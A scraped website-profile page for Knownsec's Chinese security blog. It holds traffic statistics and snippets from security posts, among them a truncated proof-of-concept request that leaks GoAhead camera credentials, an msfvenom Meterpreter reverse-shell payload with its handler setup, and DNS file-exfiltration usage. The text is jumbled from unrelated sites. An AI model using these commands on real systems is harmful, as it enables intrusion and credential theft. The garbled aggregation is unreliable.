blog.knownsec.com

知道创宇

抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. Date 2017年03月19日注本文首发自 paper.seebug.org. PDF 版本下载抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. 1 验证绕过导致的信息登录凭据泄漏漏洞. 作者给出POC: curl http:/ ip:port/system.ini? Return byPri; }. Printf("user %s pwd:%s n",loginuse,loginpas);. Printf("user %s pwd:%s n",loginuse,loginpas);. PszParamName ) { return -1; } / 判断url和需要查找的变量loginuse是否存在 pos1 = strstr( pos, pszParamName ); if (! Pos1 ) { return -1; } / 由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(! Memcpy( pszParamValue, pos, -1 );无法运行成功。

http://blog.knownsec.com/

OVERVIEW OF blog.knownsec.com

TRAFFIC RANK

>1,000,000

REVIEWS

0

PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

CONTACTS

ADDRESSES

SOCIAL LINKS

ONLINE SINCE

WEBSITE DETAILS

SEO

PAGES

SIMILAR SITES

TRAFFIC RANK FOR BLOG.KNOWNSEC.COM

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

April

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Wednesday

TRAFFIC BY CITY

Sign up

CUSTOMER REVIEWS

Average Rating: 4.6 out of 5 with 7 reviews

5 star

4

4 star

3

3 star

0

2 star

0

1 star

0

Hey there! Start your review of blog.knownsec.com

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

LOAD TIME

15.4 seconds

FAVICON PREVIEW

16x16
32x32
64x64
128x128
160x160
192x192
256x256

CONTACTS AT BLOG.KNOWNSEC.COM

ADD CONTACT

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

PAGES IN
THIS WEBSITE

18

SSL

EXTERNAL LINKS

111

SITE IP

221.236.7.137

LOAD TIME

15.435 sec

SCORE

6.2

PAGE TITLE

知道创宇 | blog.knownsec.com Reviews

<META> DESCRIPTION

抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. Date 2017年03月19日注本文首发自 paper.seebug.org. PDF 版本下载抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. 1 验证绕过导致的信息登录凭据泄漏漏洞. 作者给出POC: curl http:/ ip:port/system.ini? Return byPri; }. Printf(user %s pwd:%s n,loginuse,loginpas);. Printf(user %s pwd:%s n,loginuse,loginpas);. PszParamName ) { return -1; } / 判断url和需要查找的变量loginuse是否存在 pos1 = strstr( pos, pszParamName ); if (! Pos1 ) { return -1; } / 由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(! Memcpy( pszParamValue, pos, -1 );无法运行成功。

<META> KEYWORDS

1 博客首页

2 公司官网

3 公司活动

4 漏洞通告

5 技术分享

6 安全研究

7 rss feed

8 更好更安全的互联网

9 author 知道创宇404安全实验室

10 一、漏洞背景

CONTENT

Page content here

KEYWORDS ON PAGE

博客首页,公司官网,公司活动,漏洞通告,技术分享,安全研究,rss feed,更好更安全的互联网,author 知道创宇404安全实验室,一、漏洞背景,goahead,当然，各厂商也会根据不同产品需求对其进行一定程度的二次开发,事件源于pierre kim在博客上发表的一篇文章,披露了存在于1250多个摄像头型号的多个通用型漏洞,二、漏洞分析,如有错误，欢迎指正,loginuse&loginpas,作者给出 poc,curl,http,ip port/system ini,可以看出，只要,时均可通过验证

CONTENT-TYPE

utf-8

GOOGLE PREVIEW

知道创宇 | blog.knownsec.com Reviews

https://blog.knownsec.com

抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. Date 2017年03月19日注本文首发自 paper.seebug.org. PDF 版本下载抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. 1 验证绕过导致的信息登录凭据泄漏漏洞. 作者给出POC: curl http:/ ip:port/system.ini? Return byPri; }. Printf("user %s pwd:%s n",loginuse,loginpas);. Printf("user %s pwd:%s n",loginuse,loginpas);. PszParamName ) { return -1; } / 判断url和需要查找的变量loginuse是否存在 pos1 = strstr( pos, pszParamName ); if (! Pos1 ) { return -1; } / 由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(! Memcpy( pszParamValue, pos, -1 );无法运行成功。

INTERNAL PAGES

blog.knownsec.com

1

xss

http://blog.knownsec.com/tag/xss

2015-11-03 作者 niubl Categories: 技术分享. WordPress 被爆 DOM XSS 漏洞，数百万站点受影响. 2015-05-08 作者刘开水 Categories: 技术分享. Jinja2 2.0 /utils.py urlize vulnerability. 2014-10-31 作者 niubl Categories: 漏洞通告. 2014-09-16 作者刘开水 Categories: 技术分享. 2014-07-14 作者糜忠岐糜 Categories: 安全研究. Attack Your Android Apps By Webview. 2013-03-17 作者 niubl Categories: 技术分享. 2012-03-06 作者余弦 Categories: 安全研究. 2012-02-16 作者余弦 Categories: 安全研究. 抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. WordPress REST API 内容注入漏洞事件分析报告. Joomla 权限提升漏洞 CVE-2016-9838 分析.

2

【警惕 ProFTPD 高危安全漏洞(CVE-2015-3306)】全球预警报告v1 - 知道创宇

http://blog.knownsec.com/2015/04/proftpd_cve-2015-3306

警惕 ProFTPD 高危安全漏洞(CVE-2015-3306) 全球预警报告v1. 知道创宇安全研究团队 2015 . 04. 23. 近日，开源 FTP 服务器程序 ProFTPd 被曝出一个未授权文件复制漏洞 CVE-2015-3306 ，该漏洞是由于 ProFTPd 中的 mod copy 模块造成的。通过网络空间搜索引擎 ZoomEye 进行全网搜索，发现 ProFTPd 在全球网络空间中被普遍使用，该漏洞对欧美国家的服务器影响较大，中国受影响服务器的数量较少。 ProFTPd 的 mod copy 模块本用于文件复制操作，但在存在漏洞的版本中，mod copy 模块的相关命令操作未设置访问授权验证，导致任意客户端均能通过特定命令对系统中任意文件进行复制，在一定条件下攻击者能够利用该漏洞获取系统敏感文件、获取服务器权限等。目前，在许多 Linux 发行版如 Debian 的软件包中，ProFTPd 都被默认安装并加载了存在该漏洞的 mod copy 模块，直接对系统构成威胁。从 https:/ github.com/proftpd/proftpd/ 上克隆最新源代码，重新编译安装.

3

WordPress 被爆 DOM XSS 漏洞，数百万站点受影响 - 知道创宇

http://blog.knownsec.com/2015/05/wordpress-lt-4-2-2-dom-xss

WordPress 被爆 DOM XSS 漏洞，数百万站点受影响. WordPress 被爆 DOM XSS 漏洞，数百万站点受影响，该漏洞存在于 WordPress 流行的 Genericons example.html 页面中，默认主题 Twenty Fifteen 及知名插件 Jetpack 都内置了该页面，经过分析发现原来是 example.html 使用了存在 DOM XSS 漏洞的 jQuery老版本。 11 年 dmethvin 提交 jQuery 1.6.1 版本的 Ticket #9521 , 其原因是由 $() jQuery() 预期的 CSS 选择器在其他情况下可以用于创建 HTML 元素，如果编码不当事实上很多编码不当的情况，将会导致产生 DomXSS 漏洞。 JQuery 1.6.1. Https:/ ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js". WordPress 默认主题 twentyfifteen 示例. Example.html 297-299 lines:. Are we dealing ...

4

Samba 3.0.37

http://blog.knownsec.com/tag/samba-3-0-37

Tag Archives: Samba 3.0.37. Samba 3.0.37 EnumPrinters 堆内存溢出漏洞. 2015-05-20 作者刘开水 Categories: 技术分享. Samba 3.0.37. 抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. WordPress REST API 内容注入漏洞事件分析报告. Joomla 权限提升漏洞 CVE-2016-9838 分析. Nagios Core 代码执行漏洞 CVE-2016-9565 分析. Roundcube 1.2.2 远程命令执行漏洞漏洞分析. GitLab 任意文件读取漏洞 (CVE-2016-9086) 和任意用户 token 泄露漏洞分析. GNU tar 解压路径绕过漏洞(CVE-2016-6321) 分析. 2012 知道创宇. Powered by WordPress.

5

Attack Your Android Apps By Webview - 知道创宇

http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview

Attack Your Android Apps By Webview. 在 webzine0x06 的文章 Android应用安全之android平台上的xss攻击详细介绍了android平台上的浏览器跨域及应用apk上的xss漏洞的从发现到利用过程。所以 Android应用安全之android平台上的xss攻击一文里重点分析寻找对系统里设置了other可读的文件有读取权限，而忽视了对应用程序的owner数据文件有读取权限的利用。这是因为在 Android应用安全之android平台上的xss攻击一文里提到的浏览器跨域漏洞利用效果的致命的弱点为了弥补在显示和操作方面的先天不足，广泛采用apk机制，也就是说把各大sns应用都开发自己的手机客服端应用，这个方式直接扼杀了浏览器跨域漏洞跨单纯http协议之间上利用价值。也正是这个原因，所以各大sns网络的应用就在本身集成了浏览器功能 Webview ，而在以后的测试中发现，这个机制可能给用户带来致命的威胁. List of devices attached. Pull: building file list. Pull: /data...

UPGRADE TO PREMIUM TO VIEW 13 MORE

TOTAL PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

navisec.it

网络安全博客 NaviSec.it – 纳威安全导航 | 网络安全导航

http://www.navisec.it/main/index/20

网络安全人员的上网导航 – Ctrl D 收藏. 技术分享 HackerOne第三季度TOP 5 漏洞报告. 技术分享从PouchDB到RCE: 一个node.js注入向量. Linux Shell 1 /dev/null 2 &am…. EndNote v7.7.1升级地址.

blog.safebuff.com

git-flow usage | xl7dev

http://blog.safebuff.com/2016/11/04/git-flow-usage

Git push -u origin develop. Git checkout -b some-feature develop. Git push -u origin some-feature. Git pull origin develop. Git merge - no-ff some-feature. Git push origin develop. Git branch -d some-feature. Git push origin - delete some-feature. Git checkout -b release-0.1.0 develop. Git merge - no-ff release-0.1.0. Git merge - no-ff release-0.1.0. Git branch -d release-0.1.0. If you pushed branch to origin:. Git push origin - delete release-0.1.0. Git tag -a v0.1.0 master. Git push - tags.

blog.safebuff.com

Archive | xl7dev

http://blog.safebuff.com/archives

73 posts in total. Keep on posting. Meterpreter Proxy and Route. Dumping Memory on iOS. Nagios Exploit Root PrivEsc CVE-2016-9566. Nagios Exploit Command Injection CVE-2016-9565. Transfer files via DNS. Apache Tomcat Remote Code Execution(CVE-2016-8735). Dell PowerEdge R530 Install ESXI6.0. Metasploit Reverse Shell via CMD. Theme - NexT.Muse.

blog.safebuff.com

Dumping Memory on iOS | xl7dev

http://blog.safebuff.com/2016/12/28/Dumping-Memory-on-iOS

Dumping Memory on iOS. LLDB (http:/ lldb.llvm.org/). Tcprelay.py ([https:/ github.com/xl7dev/SecTools/tree/master/iOSTool]). 1 via usb to connect mobile and MacOS. 2 open xcode Window Devices. 3 scp root@iOSIP:/Developer/usr/bin/debugserver /debugserver. 4 lipo -thin arm64 /debugserver -output /debugserver. Armv6设备 iPhone, iPhone2, iPhone3G, 第一代、第二代 iPod Touch. Armv7设备 iPhone3GS iPhone4,iPhone4S iPad, iPad2, iPad3(The New iPad), iPad mini iPod Touch 3G, iPod Touch4. 6 ldid -Sent.xml debugserver. Lldb) im...

blog.safebuff.com

Metasploit Reverse Shell via CMD | xl7dev

http://blog.safebuff.com/2016/11/01/Metasploit-Reverse-Shell-via-CMD

Metasploit Reverse Shell via CMD. Msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.0.103 LPORT=4444 EXITFUNC=thread -f vbs - arch x86 - platform win test.vbs. No encoder or badchars specified, outputting raw payload. Payload size: 354 bytes. Final size of vbs file: 7384 bytes. Msf exploit(handler) set payload windows/meterpreter/reverse tcp. Payload = windows/meterpreter/reverse tcp. Msf exploit(handler) set LHOST 192.168.0.103. Started reverse TCP handler on 192.168.0.103:4444.

tonyhead.com

DISQUS/多说心得 | TONYHEAD 通利堂

https://www.tonyhead.com/archive/2014/08021048

881903商业电台节目光明顶 Podcast https:/ 881903.club/. 在周六, 08/02/2014 - 10:48 提交. 用第三方评论系统能提高网站的安全性水桶理论，不少安全网站. 国内服务的缺点网站接入社会化评论需取得 ICP 备案. 记得后台中 https:/ 站台名.disqus.com/admin/settings/ 中打开游客评论获得更多评论。 Http:/ 站台名.disqus.com/latest.rss 可以输出评论，加上 Yahoo Pipes. 周四, 10/15/2015 - 13:52. Switch to plain text editor. 允许的HTML标签 a em strong cite blockquote code ul ol li dl dt dd. Shadows over Innistrad Set Review 依尼翠暗影. 2 周 6 小时之前. 1个月 4 周之前. 广州集装箱建筑 Guangzhou container architecture. PTI/Reefer training in YICT.

blog.safebuff.com

xl7dev

http://blog.safebuff.com/page/2

Raspberry pi as Download with Aria. Pi@raspberrypi: $ sudo apt-get install aria2. Pi@raspberrypi: $ git clone https:/ github.com/ziahamza/webui-aria2. Pi@raspberrypi: $ sudo mkdir /etc/aria2. Pi@raspberrypi: $ sudo touch /etc/aria2/aria2.session. Pi@raspberrypi: $ sudo touch /etc/aria2/aria2.conf. Pi@raspberrypi: $ sudo chmod 666 /etc/aria2/aria2.session. Pi@raspberrypi: $ sudo chmod 666 /etc/aria2/aria2.conf. Pi@raspberrypi: $ sudo vi /etc/aria2/aria2.conf. Respberry pi as time capsule. Proc /proc proc ...

blog.safebuff.com

Transfer files via DNS | xl7dev

http://blog.safebuff.com/2016/12/11/Transfer-files-via-DNS

Transfer files via DNS. Sudo python server.py -f /path/to/file. Runmebat payloadserverhostname fileparts publicdnsserver. Powershell client.ps1 -server where.your.server.resolves.com. Runmebat payloadserver.yourdomain.com 42 8.8.8.8. If just testing internally, you can use the following example:. Runmebat payloadserverhostname fileparts payloadserverIPaddr. Apache Tomcat Remote Code Execution(CVE-2016-8735). Nagios Exploit Command Injection CVE-2016-9565. Theme - NexT.Muse.

UPGRADE TO PREMIUM TO VIEW 103 MORE

TOTAL LINKS TO THIS WEBSITE

111

SOCIAL ENGAGEMENT

80vul/status/314023215469047809

OTHER SITES

blog.knowmorechris.com

knowmoreChris | Coffee. Food. Photography. Music. Hong Kong.

Coffee. Food. Photography. Music. Hong Kong. Skip to primary content. Skip to secondary content. 豚王 Butao Ramen: Where the ramen frenzy is started at. April 28, 2012. Back in mid year 2010, a ramen frenzy has since started in Hong Kong, this is all began with one ramen (拉麵) restaurant they even began hype before their grand opening with the help of local TV show and gourmet columnist – Butao Ramen 豚王. Butao Ramen, Causeway Bay. Butao Ramen, Central. Continue reading →. Share my blog if you liked it:.

blog.knownafrique.com

KnownAfrique | We make the law known

We make the law known. The journey so far. October 10, 2016. The Traffic Act (Cap.403): Minor Offenses Rules,2016. We aim to keep you informed of latest passed laws. Today, we bring you an update on the Traffic Act that was recently passed. Take a look at the minor offenses rules you should be aware of. As an upcoming feature on our Law App. You will be able to receive similar notifications directly on your handset! May 20, 2016. Job Opening]: COUNSEL (INVESTIGATIONS AND COMPLIANCE) at One Acre Fund.

blog.knowncircle.com

KnownCircle

Boring to Bodacious: 10 Benefits of Social Media Marketing for the Boring Business. This article was written by Ryan Hanley and originally published on Agency Nation. Insurance is boring. It just is. That doesn’t mean the marketing of insurance has to be boring. Over last five years I’ve given more than 60. Read more. Here’s Why Life Insurance Agents Must Disrupt Their Approach to Marketing. Customer Relationships in Insurance Industry. KnownCircle Expands Social Referral Marketing Services to Local Busi...

blog.knownhost.com

- Because Your Business Deserves Quality Managed Hosting

KnownHost's sales and billing staff is available 9:00AM - 5:00PM EST Monday thru Friday via phone and email. Technical Support is available 24x7x365 via our email and/or helpdesk. Benefits From Using Video on Your Business Website. August 3, 2015. July 13, 2015. Lower Your Bounce Rate. As videos can seem annoying to some, the ones that users choose to click and watch can make all the difference for your sites bounce rate. Change Up the Content You Deliver. Another benefit of using videos on your business...

blog.knownmore.com

knownmore.com网站

blog.knownsec.com

知道创宇

抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. Date 2017年03月19日注本文首发自 paper.seebug.org. PDF 版本下载抓住新代码的影子基于GoAhead系列网络摄像头多个漏洞分析. 1 验证绕过导致的信息登录凭据泄漏漏洞. 作者给出POC: curl http:/ ip:port/system.ini? Return byPri; }. Printf("user %s pwd:%s n",loginuse,loginpas);. Printf("user %s pwd:%s n",loginuse,loginpas);. PszParamName ) { return -1; } / 判断url和需要查找的变量loginuse是否存在 pos1 = strstr( pos, pszParamName ); if (! Pos1 ) { return -1; } / 由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(! Memcpy( pszParamValue, pos, -1 );无法运行成功。

blog.knowroaming.com

KnowRoaming | Reduce Roaming Fees

Traveling with kids: 6 Travel Tips. August 10, 2015. So you’ve booked your vacation and you’re excited to show your kids the world. We get it we love kids too! We want to help you enjoy the fun amidst the inevitable chaos so check out our best tips for traveling with kids below. 1 Get a stroller you can bring on airplanes. You don’t have to be the last ones off the plane anymore. Get going quickly with a stroller that collapses into the size of a backpack. 3 Find the most addictive games. If you’re looki...

blog.knowsee.com

Default Parallels Plesk Panel Page

Web Server's Default Page. This page is generated by Parallels Plesk Panel. The leading hosting automation software. You see this page because there is no Web site at this address. You can do the following:. Create domains and set up Web hosting using Parallels Plesk Panel. Parallels is a worldwide leader in virtualization and automation software that optimizes computing for consumers, businesses, and Cloud services providers across all major hardware, operating systems, and virtualization platforms.

blog.knowshops.com

Knowshops Blog

Know all your options before you spend. February 6, 2013. Bull; 353,458 notes. Click to gain hundreds of new followers! February 6, 2013. Boostlikes helps you boost your twitter likes. February 6, 2013. Bull; 6,318 notes. February 5, 2013. Bull; 10,779 notes. Checkout more shoes here. February 5, 2013. Bull; 5,231 notes. Checkout more jewellery store here. February 5, 2013. Bull; 3 notes. By Vietto velvet skirt. By Miracle Eye black Chloe dress. By Allen Company tie dye scarf. February 5, 2013. In the re...

blog.knowsky.com

Blog聚合_博客联播_当我们Blog在一起_Blog.knowsky.com

1 部署IIS 1.1 安装WAS IIS原本是不支持非HTTP协议的服务，为了让IIS支持net.tcp，必须先安装WAS(Windows Process Activation Serv. 我使用WIN2008 R2 X64系统安装MDT2012 U1 X64+ADK+WDS后，部署DELL OEM win7系统，部署完成后系统无法激活，但在WIN2003 SP2系统中. Outlook 2010隐藏邮件头信息的功能不好用视图-视图设置-其他设置- 隐藏邮件头信息打勾。 ASPNET Web API教程 5.2 发送HTML表单数据 URL编码的表单数据. 注本文是 ASP.NET Web API系列教程的一部分，如果您是第一次看本系列教程，请先看前面的内容。 52 Sending HTML Form Data 5.2 发送HTML表单. 1、我有一个表格，约6.3MB 全是文字。 Win7 64 位下老是蓝屏，贴上Debug信息. AspNet MVC4入门指南官方教程本土化之十- 查看Detail和Delete方法. Ois Beaufort又在Chromium最近的代码库里发现了新端...

blog.knowsus.org

KnowSus Blog: Sharing Personalised Knowledge

How to convert your failure into success. August 9, 2015. How to choose a right career path. August 5, 2015. Subscribe to KnowSus Newsletter. Tips for writing a successful Curriculum Vitae (CV). August 2, 2015. About Author: Dhruv Mishra completed his masters in Biomedical Sciences from University of Veterinary Medicine Hannover, Germany, and currently enrolled as Doctoral Researcher in Medicine…. Read Article →. Apologies, but no entries were found. For Further Details, See Below:. Word limit: 500 words.